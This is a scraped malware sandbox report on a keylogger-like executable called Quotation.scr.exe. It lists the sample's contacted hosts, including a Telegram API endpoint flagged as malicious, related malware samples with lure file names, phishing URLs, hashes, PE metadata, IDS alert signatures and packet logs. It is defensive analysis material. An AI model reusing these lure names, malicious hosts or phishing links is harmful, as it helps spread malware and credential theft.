                    https://reallyfreegeoip.org/xml/Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    132.226.8.169
                    checkip.dyndns.comUnited States
                    16989UTMEMUSfalse
                    149.154.167.220
                    api.telegram.orgUnited Kingdom
                    62041TELEGRAMRUtrue
                    188.114.96.3
                    reallyfreegeoip.orgEuropean Union
                    13335CLOUDFLARENETUStrue
                    135.181.160.46
                    eg-mart.comGermany
                    24940HETZNER-ASDEfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1507754
                    Start date and time:2024-09-09 08:54:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Quotation.scr.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/0@4/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 361
                    • Number of non-executed functions: 33
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target RegAsm.exe, PID 2432 because it is empty
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    02:55:16API Interceptor11765548x Sleep call for process: RegAsm.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    132.226.8.169Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    Skrumle.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    CV-JOB REQUEST.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                    • checkip.dyndns.org/
                    FACTURA09.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                    • checkip.dyndns.org/
                    FACTURA_PDF.exeGet hashmaliciousGuLoaderBrowse
                    • checkip.dyndns.org/
                    Factura.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                    • checkip.dyndns.org/
                    149.154.167.220SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    66dcad8f5f33a_crypted.exeGet hashmaliciousMicroClip, RedLineBrowse
                                      IDMan.exeGet hashmaliciousFredy StealerBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        reallyfreegeoip.orgSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        api.telegram.orgSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                        • 149.154.167.220
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        66dcad8f5f33a_crypted.exeGet hashmaliciousMicroClip, RedLineBrowse
                                        • 149.154.167.220
                                        IDMan.exeGet hashmaliciousFredy StealerBrowse
                                        • 149.154.167.220
                                        checkip.dyndns.comSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.6.168
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELEGRAMRUSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                        • 149.154.167.220
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
                                        • 149.154.167.99
                                        s.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        • 149.154.167.99
                                        UTMEMUSReport Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        https://vigilantesecurity.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        https://domainsecurityreports.ca/index.shtmlGet hashmaliciousUnknownBrowse
                                        • 132.226.214.62
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Distributrnets.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.lzh.lzh.lzh.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        CLOUDFLARENETUShttps://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/c16392c5-3f33-44df-b0b3-21de244d07c1?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuSAoQTcZBzKZHtH4uVLaC9IQ4Uu8Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        https://www.cognitoforms.com/Wetakethecake/WeTakeTheCake#vR_oiUXojzonA0D6pvtbQdYGiL6oaoT5xWL0wQgDDEc$*Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        https://darlin.com.au/Get hashmaliciousUnknownBrowse
                                        • 172.64.150.190
                                        https://eu-central-1.protection.sophos.com/?d=convertcontacts.com&u=aHR0cDovL21haWwuY29udmVydGNvbnRhY3RzLmNvbS9scy9jbGljaz91cG49dTAwMS4tMkZPZ2p2UDZlSEpMUThnRkNaWFFWYVdwSW9wc2R3cTcyQzhaR2p0eWFDYmt1U25VYkpra2g5YTVWdUxMZ3VQcTA2OFpPX2otMkIzT0FHSFlyemxyWGM0d1dHdkFlaXYtMkZNV2VJQTlOWk9iOTc0YS0yQlpvdnAxN0l5aGZoeWdhczFXVkJvMTNESUhrNWF5eEpuSHB6ZEdzeXI3SEJ4eE9ZVGxlZHp3R090RUNYcFJad0ljUC0yRlU2Um1RMlZZRS0yQm5lNU4zUTZMTHNQNXJRNTNyZi0yQmRGVFc4bThFTlNFdGI2dWFtLTJGR3NrQ3lZQjBVQ3oxalh1elAtMkYxb3BIQmxaaEF3YWI5ZHFmcXhVb3hXU0puWlh5eS0yRmtFS2FJLTJGSUU1eUhCQS0zRC0zRA==&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllMzg2&t=MzVESEtqZVpmK2lydmd6VlJBZ0dOd0VXaHNLamhvK21MK1pYQzM4L0JEUT0=&h=e14b286494664ef891348988c9e838b4&s=AVNPUEhUT0NFTkNSWVBUSVYoFOpcRSmtylFH3LId5iHD0shJ7qIqV8UAVy4ANYCuCYR3Alb2xoJLC7nF0vB_FDAfdi-bbhqFa2YYLKpVwPUnPTAMVQe9kqbfwYJ_E95MtwGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.45.208
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        MARINE HONESTY VESSEL'S DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        payment receipt #8646850983653.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        RFQ.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        RFQ DO NO17665.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        3b5074b1b5d032e5620f69f9f700ff0epko_trans_details_20240909_105339#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        SKT ____202409_____6__.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        filz.exeGet hashmaliciousFormBookBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        rfqlastquaterproductpurchaseorderimportlist09.batGet hashmaliciousGuLoader, RemcosBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        Report Of Special Working Allowance (Eng) Aug 2024_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        Zaplata_06092024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        MV XINHONG PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        uD9I18eLZ6.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, RedLine, zgRATBrowse
                                        • 149.154.167.220
                                        • 135.181.160.46
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.432801846329874
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Quotation.scr.exe
                                        File size:6'144 bytes
                                        MD5:e0a5ee16dd5018801a0afadb2559b555
                                        SHA1:26443711531805d3e268212b552632558e90a015
                                        SHA256:6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
                                        SHA512:79b0405fcf1a4931867834278f771e5be1f1637bd8746a16934f6e6118ee6559dc546de2d3e912bb269e4e22e938d0b6599473813b6ca1de27623615110ae473
                                        SSDEEP:48:6gmEHl21SxTrP8tMVjKRHD8MB+MuER8YwNjkGlqLcyxwssJh7VeCtnUlaaIFWpfG:t2weW5OHN+2yBNjLScyxNGhQcczNt
                                        TLSH:5DC1D910A3F8437BDD720B719CB3A3406278F351995BCF9D1985214B3E53B918A53FA2
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'D.f.............................,... ...@....@.. ....................................`................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x402c8e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66DE4427 [Mon Sep 9 00:41:11 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2c380x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5a6.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xc940xe00dd5605ee7baf6ea3867e8966ac7f3f55False0.5415736607142857data5.040385941640028IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x40000x5a60x600ca94ddebdb95a1c56a83a191de7faac4False0.4173177083333333data4.075974040120256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x60000xc0x200880af27eaae1f8845d7921a8312b435fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x40a00x31cdata0.4321608040201005
                                        RT_MANIFEST0x43bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-09T08:55:16.251452+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649713132.226.8.16980TCP
                                        2024-09-09T08:55:17.251451+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649713132.226.8.16980TCP
                                        2024-09-09T08:55:17.814271+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649719188.114.96.3443TCP
                                        2024-09-09T08:55:18.642109+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649720132.226.8.16980TCP
                                        2024-09-09T08:55:21.173447+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649723132.226.8.16980TCP
                                        2024-09-09T08:55:23.548357+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649725132.226.8.16980TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 9, 2024 08:54:55.550035954 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:55.550084114 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:55.550168991 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:55.563877106 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:55.563893080 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.268280983 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.268399000 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.272428036 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.272438049 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.272679090 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.329550982 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.348726034 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.396500111 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690891027 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690917969 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690926075 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690952063 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690964937 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.690969944 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.691040993 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.691065073 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.691139936 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.692837000 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.692854881 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.692943096 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.692949057 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.735846043 CEST49710443192.168.2.6135.181.160.46
                                        Sep 9, 2024 08:54:56.796092033 CEST44349710135.181.160.46192.168.2.6
                                        Sep 9, 2024 08:54:56.796118975 CEST44349710135.181.160.46192.168.2.6
